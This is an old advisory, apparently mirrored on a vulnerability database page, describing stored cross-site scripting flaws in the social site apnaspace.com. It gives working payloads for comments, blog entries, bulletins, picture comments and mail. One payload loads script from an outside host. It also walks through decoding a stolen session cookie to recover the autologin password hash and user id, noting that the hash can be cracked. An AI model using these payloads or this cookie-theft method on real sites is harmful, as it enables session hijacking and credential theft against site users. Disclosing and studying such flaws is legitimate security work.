Vulners
Lucene search
apnaspace.txt
`Apnaspace.com (A myspace type site for arab & indian teens)
Homepage:
http://www.http://www.apnaspace.com
Effected files:
* Comment input box:
* Posting a blog entry:
- Entry title
- Entry body
* Viewing a profile
* Posting a bulletin.
* Commenting on a picture
* Sending mail to someone
------------------------------------------------------
XSS vuln with cookie disclosure via posting a comment:
Since there a vulnerability in bbcode 1.23.1 and below, we can execute our XSS example and display the cookie info by putting the following in as a comment:
[img]javascript:alert(document.cookie)[/img]
This also works when creating a new blog entry too. Just put the above codeinasyour"entry title" or "entry subject"
Screenshots:
http://www.youfucktard.com/xsp/apna1.jpg
http://www.youfucktard.com/xsp/apna2.jpg
Our Cookie:
TIME=1150153432; switchmenu; apnaforum_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%223462%22%3B%7D; apnaforum_sid=2964cbd2c5a3f3d1a911fbf777c32300; NATIO=luny666;__utma=265362911.794893539.1150148238.1150148238.1150151884.2; __utmc=265362911; __utmz=265362911.1150148238.1.1.utmccn=(referral|utmcsr=dmoz.org|utmcct=/Recreation/Picture_Ratings/|utmcmd=referral; __utmb=265362911
The cookie looks pretty much the same as a few of the others I've discussed. I'll just post whats needed:
Dcoding the Hex value of:
apnaforum_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%223462%22%3B%7D;
We get:
a:2:{s:11:"autologinid";s:32:"91da4589b012c2fe1ceac1fb2363dbc6";s:6:"userid";s:4:"3462";}
What we need:
91da4589b012c2fe1ceac1fb2363dbc6 (Our md5 hashed password, which is fuckit)
Our userid is:3462
Now lets godown to NATIO=luny666 (This is our username)
Congrats, you now know the md5 hashed pw, which can be cracked, as well as our username from this cookie. Lets move on to other parts of the site that suffer from XSS vulns.
---------------------------------------------
Posting a bulletin XSS vuln:
When postinga bulletin, userinput is not sanatized and filtered before being generated. So, unlike above, where we had to use the sites standard bbcode tags, we can just use normal html tags here. For PoC when submitting a bulletin, try putting <SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT> in as your bulletin subject.
Screenshots:
http://www.youfucktard.com/xsp/apna3.jpg
http://www.youfucktard.com/xsp/apna4.jpg
http://www.youfucktard.com/xsp/apna5.jpg
----------------------------------------------
Commenting on a picture:
Same ast he first XSS vuln, we use bbcode here. ForPoC try putting the following in as your comment when rating a picture:
[img]javascript:alert(document.cookie)[/img]
Screenshots:
http://www.youfucktard.com/xsp/apna6.jpg
http://www.youfucktard.com/xsp/apna7.jpg
-------------------------------------------------
Sending someone mail:
No filtering is needed here,for PoC as your mail title or subject just put:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
---------------------------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Jun 2006 00:00Current
7.4High risk
Vulners AI Score7.4